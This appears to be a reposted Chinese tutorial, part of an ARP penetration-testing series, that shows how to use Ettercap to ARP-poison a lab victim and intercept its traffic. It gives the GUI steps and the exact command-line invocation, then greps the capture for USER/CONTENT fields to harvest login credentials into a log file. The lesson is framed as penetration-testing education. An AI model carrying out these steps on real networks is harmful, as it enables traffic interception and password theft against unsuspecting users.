ARP渗透与攻防(五)之Ettercap劫持用户流量

这篇具有很好参考价值的文章主要介绍了ARP渗透与攻防(五)之Ettercap劫持用户流量。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

ARP-Ettercap劫持用户流量

系列文章

ARP渗透与攻防(一)之ARP原理
ARP渗透与攻防(二)之断网攻击
ARP渗透与攻防(三)之流量分析
ARP渗透与攻防(四)之WireShark截获用户数据

一.ettercap 工具介绍

项目官网:http://ettercap.github.io/ettercap/index.html

EtterCap是一个基于ARP地址欺骗方式的网络嗅探工具,主要适用于交换局域网络。借助于EtterCap嗅探软件,渗透测试人员可以检测网络内明文数据通讯的安全性,及时采取措施,避免敏感的用户名/密码等数据以明文的方式进行传输。

ettercap几乎是每个渗透测试人员必备的工具之一。

二.ARP截获用户信息攻击步骤

环境准备

kali 作为ARP攻击机,IP地址:192.168.110.12

win10 作为被攻击方,IP地址:192.168.110.11

网关(路由器),IP地址:192.168.110.1

1.启动ettercap
ettercap -G

sniffing at startup,ARP渗透与攻防,网络,网络安全,安全

2.点击右上角的对勾开始扫描

sniffing at startup,ARP渗透与攻防,网络,网络安全,安全

3.点击左上角查看主机列表

sniffing at startup,ARP渗透与攻防,网络,网络安全,安全

4.选择网关 点击底部的 Add to Target 1

sniffing at startup,ARP渗透与攻防,网络,网络安全,安全

5.选择被攻击的靶机加入到target2

sniffing at startup,ARP渗透与攻防,网络,网络安全,安全

6.点击右上角攻击菜单,选择ARP攻击

sniffing at startup,ARP渗透与攻防,网络,网络安全,安全

7.点击ok发起攻击

sniffing at startup,ARP渗透与攻防,网络,网络安全,安全

8.查看此时靶机的arp列表
arp -a| findstr 192.168.110.1

sniffing at startup,ARP渗透与攻防,网络,网络安全,安全

8.查看kali的mac地址
ip a

sniffing at startup,ARP渗透与攻防,网络,网络安全,安全
可以看到现在靶机上arp表里的网关的MAC地址已经被替换为了kali的MAC地址,我们的靶机已经被毒化了。

10.靶机登录网站

sniffing at startup,ARP渗透与攻防,网络,网络安全,安全

11.kali截获用户流量,获取账号密码

sniffing at startup,ARP渗透与攻防,网络,网络安全,安全

12.停止攻击

sniffing at startup,ARP渗透与攻防,网络,网络安全,安全

三.Ettercap 软件功能介绍

1.启动界面

sniffing at startup,ARP渗透与攻防,网络,网络安全,安全

Sniffing at startup :开启嗅探模式

Primary interface :选择网卡

Bridged sniffing :是否开启桥接模式

Bridged interface :桥接模式下的网卡

配置完成后,我们点上方的✔即可完成配置。

sniffing at startup,ARP渗透与攻防,网络,网络安全,安全

2.中间人攻击菜单

sniffing at startup,ARP渗透与攻防,网络,网络安全,安全

ARP poisoning :ARP攻击

DNP poisoning :DNP攻击

ICMP redirect :icmp重定向

Port stealing :端口欺骗

DHCP spoofing :DHCP欺骗

stop MITM :停止攻击

SSL intercept :ssl嗅探

3.更多选项

sniffing at startup,ARP渗透与攻防,网络,网络安全,安全

Targets:攻击列表

Hosts:显示主机列表

Filters:载入二进制脚本

Plugins:插件

Logging:日志

4.hosts选项

sniffing at startup,ARP渗透与攻防,网络,网络安全,安全

Hosts list:扫描到的主机列表

Enable ipv6 scan:扫描ipv6地址

Scan for hosts:扫描主机列表

load hosts form file:从外部文件载入主机列表

Save hosts to file:保存主机列表到文件

5.Targets选项

sniffing at startup,ARP渗透与攻防,网络,网络安全,安全

Current targets:正在攻击的列表

Select targets::选择攻击列表

Portocol:攻击协议

Reverse matching:匹配规则

Wipe targets:擦除攻击

6.View选项

sniffing at startup,ARP渗透与攻防,网络,网络安全,安全

Connections:连接信息

Profiles:IP地址信息

Statistics:统计信息

四.命令行运行Ettercap

1.运行命令讲解
ettercap –i –eth0 –Tq –M arp:remote/ip(host)//net gatemask/ >>b.txt
T:指的是text文本模式
q:指的是安静模式执行这个命令
i:后面跟的是连接局域网的网卡
M:后面跟的是指定使用arp的方式
>>:输出文件
2.攻击命令
ettercap -Tq -i eth0  -M arp:remote /192.168.110.1// /192.168.110.11// >>b.txt

sniffing at startup,ARP渗透与攻防,网络,网络安全,安全

3.靶机登录后台网站

sniffing at startup,ARP渗透与攻防,网络,网络安全,安全

4.查看攻击界面日志
cat b.txt

sniffing at startup,ARP渗透与攻防,网络,网络安全,安全sniffing at startup,ARP渗透与攻防,网络,网络安全,安全

5.过滤无用信息,只查看用户的登录信息
tail -f b.txt | grep "USER" 
或者
tail -f b.txt | grep "CONTENT" 
或者
tail -f b.txt | egrep "USER|CONTENT"

sniffing at startup,ARP渗透与攻防,网络,网络安全,安全
sniffing at startup,ARP渗透与攻防,网络,网络安全,安全
sniffing at startup,ARP渗透与攻防,网络,网络安全,安全文章来源地址https://www.toymoban.com/news/detail-787533.html

6.停止ARP攻击
CTRL+C
7.分析日志
cat b.txt
8.筛选用户的登录信息
cat b.txt | grep "USER" 
或者
cat b.txt | grep "CONTENT" 
或者
cat b.txt | egrep "USER|CONTENT"
9.收集保存用户信息文件
cat -n  b.txt | egrep "USER|CONTENT" >arp.log
-n:添加行号
egrep:过滤规则
>:输出文件

到了这里,关于ARP渗透与攻防(五)之Ettercap劫持用户流量的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Istio实战(九)-Envoy 流量劫持

    Envoy 是一款面向 Service Mesh 的高性能网络代理服务。它与应用程序并行运行,通过以平台无关的方式提供通用功能来抽象网络。当基础架构中的所有服务流量都通过 Envoy 网格时,通过一致的可观测性,很容易地查看问题区域,调整整体性能。 Envoy也是istio的核心组件之一,以

    2024年02月08日
    浏览(44)
  • 流量劫持 —— GZIP 页面零开销注入 JS

    HTTP 代理给页面注入 JS 是很常见的需求。由于上游服务器返回的页面可能是压缩状态的,因此需解压才能注入,同时为了节省流量,返回下游时还得再压缩。为了注入一小段代码,却将整个页面的流量解压再压缩,白白浪费大量性能。 是否有高效的解决方案?本文从注入位置

    2024年02月08日
    浏览(38)
  • WEB攻防通用漏洞&跨域CORS资源&JSONP回调&域名接管劫持

    目录 一、同源策略(SOC) 二、跨域资源(COSP) 三、回调跨域(JSOP) 四、CORS资源跨域-敏感页面原码获取 五、JSONP 回调跨域-某牙个人信息泄露 六、子域名劫持接管 同源策略 (SOP)-“ 同源 ” 包括三个条件:同协议、同域名、同端口。 会检测数据包的来源在哪里,进而来判

    2024年02月01日
    浏览(66)
  • 35、WEB攻防——通用漏洞&XSS跨站&反射&存储&DOM&盲打&劫持

    XSS产生于前端的漏洞,常产生于: XSS分类: 反射型(非持久型) 存储型(持久型),攻击代码被写入数据库中。常见于:写日志、留言、评论的地方 DOM型 DOM型XSS与反射型XSS、存储型XSS的最大区别在于:DOM型XSS前端的数据是传输给前端JS代码进行处理,而反射型XSS、存储型

    2024年01月25日
    浏览(74)
  • Kali ARP断网攻击与流量监听

    作者:geek_Niko 本文仅供学习使用,请勿用作其他用途。任何未经允许的渗透行为均属违法行为。 目的: 如何借助Kali Linux系统内置的nmap、arpspoof、ettercap等渗透测试工具对局域网内同个网段的PC主机进行ARP欺骗和流量监听,实现断网攻击、密码窃取等 工具: 工具 说明 nmap 网

    2024年02月05日
    浏览(37)
  • 《WEB安全渗透测试》(35) 使用Burp Clickbandit测试点击劫持

    点击劫持指的是,通过覆盖不可见的框架误导受害者点击,虽然受害者点击的是他所看到的网页,但其实他所点击的是被黑客精心构建的另一个置于原网页上面的透明页面。 Burp Clickbandit 是用于生成点击劫持攻击的工具,当发现可能容易受到点击劫持的网页时,可以使用 Bu

    2024年02月04日
    浏览(47)
  • 内网渗透之权限维持-自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon

    以下几种方法都需服务器重启 1、自启动路径加载 C:UsersAdministratorAppDataRoamingMicrosoftWindowsStart MenuProgramsStartup 将木马放到此目录,等待服务器重启即可 2、自启动服务加载 3、自启动注册表加载 -当前用户键值 HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun -服务器键值(

    2024年02月06日
    浏览(55)
  • JWT渗透与攻防(一)

    目录 前言 JWT漏洞介绍 案列演示之Leaky_JWT  JWT漏洞具体的实现方式:

    2023年04月09日
    浏览(31)
  • redis安全攻防(专注渗透视角)

    对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 数据库作为业务平台信息技术的核心和基础,承载着越来越多的关键数据,渐渐成为单位公共安全中最具有

    2024年02月07日
    浏览(37)
  • 攻防演练:渗透测试云上初体验

    免责声明:涉及到的所有技术仅用来学习交流,严禁用于非法用途,未经授权请勿非法渗透。否则产生的一切后果自行承担! 该渗透测试项目为已授权项目,本文已对敏感部分做了相关处理。 渗透测试本质还是在于信息收集,信息收集的越多,攻击面就越广,成功拿下主机

    2024年02月15日
    浏览(55)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包